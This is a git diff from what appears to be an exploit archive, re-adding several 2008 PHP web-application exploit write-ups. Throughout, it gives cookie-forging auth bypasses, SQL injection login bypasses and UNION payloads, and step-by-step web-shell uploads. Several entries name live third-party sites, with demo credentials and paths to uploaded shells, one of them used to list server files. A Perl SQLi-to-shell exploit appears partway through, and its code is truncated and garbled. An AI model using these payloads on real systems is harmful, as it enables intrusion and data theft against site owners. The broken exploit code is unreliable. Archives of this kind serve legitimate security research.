-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	Turnkeyforms Local Classifieds Auth Bypass Vulnerability
-==============================================================================
-
-	[»] Script:             [ Turnkeyforms Local Classifieds ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.turnkeyforms.com/local-classifieds.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 12.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ DTLZ ]===
-	
-	[!] here we go...
-	[»]	http://localhost/[paht]/classifieds/Site_Admin/admin.php
-
-	
-	
-===[ LIVE ]===
-
-	[»] http://demo.turnkeyforms.com/localclassifieds/classifieds/Site_Admin/admin.php
-	[»] http://petoskeyads.com/classifieds/Site_Admin/admin.php
-	[»] http://havasufreeads.com/classifieds/Site_Admin/admin.php
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-12]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	Turnkeyforms Local Classifieds Auth Bypass Vulnerability
+==============================================================================
+
+	[»] Script:             [ Turnkeyforms Local Classifieds ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.turnkeyforms.com/local-classifieds.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 12.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ DTLZ ]===
+	
+	[!] here we go...
+	[»]	http://localhost/[paht]/classifieds/Site_Admin/admin.php
+
+	
+	
+===[ LIVE ]===
+
+	[»] http://demo.turnkeyforms.com/localclassifieds/classifieds/Site_Admin/admin.php
+	[»] http://petoskeyads.com/classifieds/Site_Admin/admin.php
+	[»] http://havasufreeads.com/classifieds/Site_Admin/admin.php
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7107.txt b/platforms/php/webapps/7107.txt
index d268438f0..89378a95f 100755
--- a/platforms/php/webapps/7107.txt
+++ b/platforms/php/webapps/7107.txt
@@ -1,99 +1,99 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	Turnkeyforms Web Hosting Directory Multiple Vulnerabilities
-==============================================================================
-
-	[»] Script:             [ Turnkeyforms Web Hosting Directory ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.turnkeyforms.com/web-hosting-directory.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 12.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ DTLZ ]===
-	
-	[0] Insecure Cookie Handling
-		
-		#	if ($_COOKIE['adm'] == 1)
-		#	{
-		#		if ($request[1] == 'logout')
-		#		{
-		#			setcookie ("adm", "0");
-		#			java_redirect($config['base_url']."admin/?".time());
-		#		}
-		#		$t->assign('logged', 1);
-		#	}
-		#	else {
-		#		if ($request[1] == 'login' && $vars['passwd'] == $config['WebInterfacePassword'])
-		#		{
-		#			setcookie ("adm", "1");
-		#			java_redirect($config['base_url']."admin/?".time());
-		#		}
-		#		$t->assign('logged', 0);
-		#	}
-		
-		[!] admin Auth bypass, panel => http://localhost/[paht]/admin/
-		[»] javascript:document.cookie = "adm=1";
-		
-		[!] users Auth bypass
-		[»] javascript:document.cookie = "logged=[username]";
-			javascript:document.cookie = "logged=g4n0k";
-		
-	
-	
-	[1] Arbitrary Database Backup
-		
-		[!] we can download a Backup of Database.
-		[»]	http://localhost/[paht]/admin/backup/db
-	
-
-	
-	[2] SQLi Auth Bypass
-		
-		[»] Username : [a_valid_username]
-		[»]	Password : ' OR '1=1--
-		
-
-===[ LIVE ]===
-
-	[»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/
-	[»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/backup/db
-	
-	[»] http://tophostingdirectory.com
-		username: ideas
-		password: ' OR '1=1--
-		
-		javascript:document.cookie = "logged=ideas";
-
-		
-		
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-12]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	Turnkeyforms Web Hosting Directory Multiple Vulnerabilities
+==============================================================================
+
+	[»] Script:             [ Turnkeyforms Web Hosting Directory ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.turnkeyforms.com/web-hosting-directory.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 12.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ DTLZ ]===
+	
+	[0] Insecure Cookie Handling
+		
+		#	if ($_COOKIE['adm'] == 1)
+		#	{
+		#		if ($request[1] == 'logout')
+		#		{
+		#			setcookie ("adm", "0");
+		#			java_redirect($config['base_url']."admin/?".time());
+		#		}
+		#		$t->assign('logged', 1);
+		#	}
+		#	else {
+		#		if ($request[1] == 'login' && $vars['passwd'] == $config['WebInterfacePassword'])
+		#		{
+		#			setcookie ("adm", "1");
+		#			java_redirect($config['base_url']."admin/?".time());
+		#		}
+		#		$t->assign('logged', 0);
+		#	}
+		
+		[!] admin Auth bypass, panel => http://localhost/[paht]/admin/
+		[»] javascript:document.cookie = "adm=1";
+		
+		[!] users Auth bypass
+		[»] javascript:document.cookie = "logged=[username]";
+			javascript:document.cookie = "logged=g4n0k";
+		
+	
+	
+	[1] Arbitrary Database Backup
+		
+		[!] we can download a Backup of Database.
+		[»]	http://localhost/[paht]/admin/backup/db
+	
+
+	
+	[2] SQLi Auth Bypass
+		
+		[»] Username : [a_valid_username]
+		[»]	Password : ' OR '1=1--
+		
+
+===[ LIVE ]===
+
+	[»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/
+	[»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/backup/db
+	
+	[»] http://tophostingdirectory.com
+		username: ideas
+		password: ' OR '1=1--
+		
+		javascript:document.cookie = "logged=ideas";
+
+		
+		
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7110.txt b/platforms/php/webapps/7110.txt
index 05c994f67..a9496d388 100755
--- a/platforms/php/webapps/7110.txt
+++ b/platforms/php/webapps/7110.txt
@@ -1,65 +1,65 @@
-[~] ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 13.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 39
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-http://localhost/script/re_images/[id]_logo_your_shell.php
-
-you register to site 
-
-register: http://localhost/script/register.php
-
-after you login to site
-
-login: http://localhost/script/login.php
-
-more after you go profile edit
-
-profile: http://localhost/script/profile.php
-
-and you upload your_shell.php right click to your logo and select properties copy link
-
-paste your explorer go your_shell.php
-
-your_shell.php path:
-
-http://localhost/script/re_images/[id]_logo_your_shell.php
-
-
-
-rfu for demo:
-
-user: zorlu
-
-passwd: zorlu1
-
-shell path:
-
-http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-13]
+[~] ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 13.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 39
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+http://localhost/script/re_images/[id]_logo_your_shell.php
+
+you register to site 
+
+register: http://localhost/script/register.php
+
+after you login to site
+
+login: http://localhost/script/login.php
+
+more after you go profile edit
+
+profile: http://localhost/script/profile.php
+
+and you upload your_shell.php right click to your logo and select properties copy link
+
+paste your explorer go your_shell.php
+
+your_shell.php path:
+
+http://localhost/script/re_images/[id]_logo_your_shell.php
+
+
+
+rfu for demo:
+
+user: zorlu
+
+passwd: zorlu1
+
+shell path:
+
+http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-13]
diff --git a/platforms/php/webapps/7111.txt b/platforms/php/webapps/7111.txt
index cd99ad541..d1533cfed 100755
--- a/platforms/php/webapps/7111.txt
+++ b/platforms/php/webapps/7111.txt
@@ -1,65 +1,65 @@
-[~] ScriptsFeed (SF) Auto Classifieds Software Remote File Upload
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 13.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 39
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-http://localhost/script/cars_images/[id]_logo_your_shell.php
-
-you register to site 
-
-register: http://localhost/script/register.php
-
-after you login to site
-
-login: http://localhost/script/login.php
-
-more after you go profile edit
-
-profile: http://localhost/script/profile.php
-
-and you upload your_shell.php right click to your logo and select properties copy link
-
-paste your explorer go your_shell.php
-
-your_shell.php path:
-
-http://localhost/script/cars_images/[id]_logo_your_shell.php
-
-
-
-rfu for demo:
-
-user: zorlu
-
-passwd: zorlu1
-
-shell path:
-
-http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-13]
+[~] ScriptsFeed (SF) Auto Classifieds Software Remote File Upload
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 13.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 39
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+http://localhost/script/cars_images/[id]_logo_your_shell.php
+
+you register to site 
+
+register: http://localhost/script/register.php
+
+after you login to site
+
+login: http://localhost/script/login.php
+
+more after you go profile edit
+
+profile: http://localhost/script/profile.php
+
+and you upload your_shell.php right click to your logo and select properties copy link
+
+paste your explorer go your_shell.php
+
+your_shell.php path:
+
+http://localhost/script/cars_images/[id]_logo_your_shell.php
+
+
+
+rfu for demo:
+
+user: zorlu
+
+passwd: zorlu1
+
+shell path:
+
+http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-13]
diff --git a/platforms/php/webapps/7112.txt b/platforms/php/webapps/7112.txt
index 8dd8b69b7..28eea9d48 100755
--- a/platforms/php/webapps/7112.txt
+++ b/platforms/php/webapps/7112.txt
@@ -1,83 +1,83 @@
-[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 13.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 39
-[~]
-[~] my target bug number: 100
-[~]
-[~] dork: allinurl:"recipedetail.php?id="  ( çok site var sömürün : ) )
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-http://localhost/script/pictures/[id]your_shell.php
-
-you register to site 
-
-register: http://localhost/script/register.php
-
-after you login to site
-
-login: http://localhost/script/login.php
-
-more after you click to "Add a Recipe" and add recipe
-
-and after click to "View your Recipes" click to you recipe open new page 
-
-right click to your photo. select properties copy photo lick
-
-and paste your explorer go your shell
-
-your_shell.php path:
-
-http://localhost/script/pictures/[id]your_shell.php
-
-
-
-rfu for demo:
-
-user: zorlu
-
-passwd: zorlu1
-
-shell path:
-
-http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php
-
-
-
-example 2: 
-
-user: zorlu
-
-passwd: zorlu1
-
-shell:
-
-http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )
-
-misal:
-
-http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-13]
+[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 13.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 39
+[~]
+[~] my target bug number: 100
+[~]
+[~] dork: allinurl:"recipedetail.php?id="  ( çok site var sömürün : ) )
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+http://localhost/script/pictures/[id]your_shell.php
+
+you register to site 
+
+register: http://localhost/script/register.php
+
+after you login to site
+
+login: http://localhost/script/login.php
+
+more after you click to "Add a Recipe" and add recipe
+
+and after click to "View your Recipes" click to you recipe open new page 
+
+right click to your photo. select properties copy photo lick
+
+and paste your explorer go your shell
+
+your_shell.php path:
+
+http://localhost/script/pictures/[id]your_shell.php
+
+
+
+rfu for demo:
+
+user: zorlu
+
+passwd: zorlu1
+
+shell path:
+
+http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php
+
+
+
+example 2: 
+
+user: zorlu
+
+passwd: zorlu1
+
+shell:
+
+http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )
+
+misal:
+
+http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-13]
diff --git a/platforms/php/webapps/7113.txt b/platforms/php/webapps/7113.txt
index c1c2655cb..5bca9a4d2 100755
--- a/platforms/php/webapps/7113.txt
+++ b/platforms/php/webapps/7113.txt
@@ -1,10 +1,10 @@
-###########################################################################
-[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
-[+] Discovered By Mountassif Moad                   
-[+] www.v4-team.com                     
-[+] Greetz : All my Freind
-###########################################################################
-Exploit:
-javascript:document.cookie = "login_auth=true; path=/";
-
-# milw0rm.com [2008-11-13]
+###########################################################################
+[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
+[+] Discovered By Mountassif Moad                   
+[+] www.v4-team.com                     
+[+] Greetz : All my Freind
+###########################################################################
+Exploit:
+javascript:document.cookie = "login_auth=true; path=/";
+
+# milw0rm.com [2008-11-13]
diff --git a/platforms/php/webapps/7114.txt b/platforms/php/webapps/7114.txt
index 6de8ec6c4..48110610e 100755
--- a/platforms/php/webapps/7114.txt
+++ b/platforms/php/webapps/7114.txt
@@ -1,155 +1,155 @@
-#!/usr/bin/perl
-
-=about
-
- MemHT 4.0.1 Perl exploit
- 
- AUTHOR
-    discovered & written by Ams
-    ax330d [doggy] gmail [dot] com
-
- VULN. DESCRIPTION:
-    Due to weak params filtering we are able to make
-    SQL-Injection. So,
-        1. Look at 'inc/ajax/ajax_rating.php', line ~ 29.
-    It is not enough to check whether script has been accessed from
-    main file. Better define some value.
-        2. 'inc/inc_login.php' line ~ 35. Here we are able to send and
-    bypass any IP. That eregi does not help, look at exploit in injection,
-    comma is the last one.
-    
-    As proof this exploit creates simple shell. 
-    
- REQUIREMENTS:
-    MySQL should be able to write to file
-	Know full server path to portal
-    
-=cut
-
-use strict;
-use warnings;
-use IO::Socket;
-
-print "
-	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	  MemHT portal 4.0.1 Perl exploit
-	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	";
-
-my $expl_url  = shift or &usage;
-my $serv_path = shift || '-b';
-my $def_shell = '/uploads/file/files.php';
-# 	Simple concept shell
-my $shell = 'new(
-		Proto    => 'tcp',
-		PeerAddr => $host,
-		PeerPort => 80
-	);
-	if( ! $socket) {
-		return 0;
-	} else {
-		
-		print $socket $packet;
-		if( $ret ) {
-			local $/;
-			$dat = <$socket>;
-		}
-		close $socket;
-		return $dat;
-	}
-}
-
-sub usage {
-	print "\n\tUsage:\t$0 http://site.com [-b|full server path]
-
-	By default exlpoit checks /lang/english.php for errors to get real path,
-	If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ).
-
-	Example:\t$0 http://localhost/ /var/www/htdocs
-			$0 http://localhost/ -b
-			$0 http://localhost/\n\n";
-	exit;
-}
-
-# milw0rm.com [2008-11-13]
+#!/usr/bin/perl
+
+=about
+
+ MemHT 4.0.1 Perl exploit
+ 
+ AUTHOR
+    discovered & written by Ams
+    ax330d [doggy] gmail [dot] com
+
+ VULN. DESCRIPTION:
+    Due to weak params filtering we are able to make
+    SQL-Injection. So,
+        1. Look at 'inc/ajax/ajax_rating.php', line ~ 29.
+    It is not enough to check whether script has been accessed from
+    main file. Better define some value.
+        2. 'inc/inc_login.php' line ~ 35. Here we are able to send and
+    bypass any IP. That eregi does not help, look at exploit in injection,
+    comma is the last one.
+    
+    As proof this exploit creates simple shell. 
+    
+ REQUIREMENTS:
+    MySQL should be able to write to file
+	Know full server path to portal
+    
+=cut
+
+use strict;
+use warnings;
+use IO::Socket;
+
+print "
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	  MemHT portal 4.0.1 Perl exploit
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	";
+
+my $expl_url  = shift or &usage;
+my $serv_path = shift || '-b';
+my $def_shell = '/uploads/file/files.php';
+# 	Simple concept shell
+my $shell = 'new(
+		Proto    => 'tcp',
+		PeerAddr => $host,
+		PeerPort => 80
+	);
+	if( ! $socket) {
+		return 0;
+	} else {
+		
+		print $socket $packet;
+		if( $ret ) {
+			local $/;
+			$dat = <$socket>;
+		}
+		close $socket;
+		return $dat;
+	}
+}
+
+sub usage {
+	print "\n\tUsage:\t$0 http://site.com [-b|full server path]
+
+	By default exlpoit checks /lang/english.php for errors to get real path,
+	If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ).
+
+	Example:\t$0 http://localhost/ /var/www/htdocs
+			$0 http://localhost/ -b
+			$0 http://localhost/\n\n";
+	exit;
+}
+
+# milw0rm.com [2008-11-13]
diff --git a/platforms/php/webapps/7116.txt b/platforms/php/webapps/7116.txt
index fd33f7f74..8565f1309 100755
--- a/platforms/php/webapps/7116.txt
+++ b/platforms/php/webapps/7116.txt
@@ -1,76 +1,76 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities
-==============================================================================
-
-	[»] Script:             [ AlstraSoft Web Host Directory v1.2 ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://alstrasoft.com/webhost.htm ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 14.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ DTLZ ]===
-	
-	[0] Insecure Cookie Handling
-				
-		[!] admin Auth bypass, panel => http://localhost/[paht]/admin/
-		[»] javascript:document.cookie = "adm=1";
-		
-		[!] users Auth bypass
-		[»] javascript:document.cookie = "logged=[username]";
-			javascript:document.cookie = "logged=g4n0k";
-		
-	
-	
-	[1] Arbitrary Database Backup
-		
-		[!] we can download a Backup of Database.
-		[»]	http://localhost/[paht]/admin/backup/db
-	
-
-	
-	[2] SQLi Auth Bypass
-		
-		[»] Username : [a_valid_username]
-		[»]	Password : ' OR ' 1=1--
-		
-
-===[ LIVE ]===
-
-	[»] http://www.hyperstop.com/demo/webhost/
-		username: testtest
-		password: ' OR ' 1=1--
-		
-		javascript:document.cookie = "logged=testtest";
-
-		
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-14]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities
+==============================================================================
+
+	[»] Script:             [ AlstraSoft Web Host Directory v1.2 ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://alstrasoft.com/webhost.htm ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 14.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ DTLZ ]===
+	
+	[0] Insecure Cookie Handling
+				
+		[!] admin Auth bypass, panel => http://localhost/[paht]/admin/
+		[»] javascript:document.cookie = "adm=1";
+		
+		[!] users Auth bypass
+		[»] javascript:document.cookie = "logged=[username]";
+			javascript:document.cookie = "logged=g4n0k";
+		
+	
+	
+	[1] Arbitrary Database Backup
+		
+		[!] we can download a Backup of Database.
+		[»]	http://localhost/[paht]/admin/backup/db
+	
+
+	
+	[2] SQLi Auth Bypass
+		
+		[»] Username : [a_valid_username]
+		[»]	Password : ' OR ' 1=1--
+		
+
+===[ LIVE ]===
+
+	[»] http://www.hyperstop.com/demo/webhost/
+		username: testtest
+		password: ' OR ' 1=1--
+		
+		javascript:document.cookie = "logged=testtest";
+
+		
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7117.txt b/platforms/php/webapps/7117.txt
index c714945e4..08eb6e001 100755
--- a/platforms/php/webapps/7117.txt
+++ b/platforms/php/webapps/7117.txt
@@ -1,100 +1,100 @@
-[~] GS Real Estate Portal US and International Module
-[~]
-[~] SQL/BYPASS/RFU/XSS
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 13.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 39
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit 1: sql inj
-
-http://localhost/script/email.php?AgentID=[SQL]
-
-
-[SQL]
-
--47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
-
-
-sql for demo:
-
-http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
-
-
-
-Exploit 2: auth bypass
-
-login: http://localhost/script/login.php
-
-username: [real_admin_or_user_name] ' or ' 1=1--
-
-password: ZoRLu
-
-note: generally admin name: admin 
-
-
-bypass for demo:
-
-login: http://hostnomi.net/int/login.php
-
-admin: admin ' or ' 1=1--
-
-passwd: ZoRLu
-
-
-exploit 3: Rfu
-
-you login to site and edit your profile upload your_shell.php
-
-after right click to your logo and select properties. copy photo link. 
-
-paste your explorer go your_shell.php
-
-
-your_shell.php path:
-
-http://localhost/script/re_images/[id]_logo_your_shell.php
-
-
-rfu for demo:
-
-user: zorlu
-
-passwd: zorlu1 
-
-edit profile: http://hostnomi.net/int/profile.php
-
-shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )
-
-
-
-exploit 4: XSS
-
-http://localhost/script/email.php?AgentID=&ListingID=">
-
-xss for demo:
-
-http://hostnomi.net/int/email.php?AgentID=&ListingID=">
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-14]
+[~] GS Real Estate Portal US and International Module
+[~]
+[~] SQL/BYPASS/RFU/XSS
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 13.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 39
+[~]
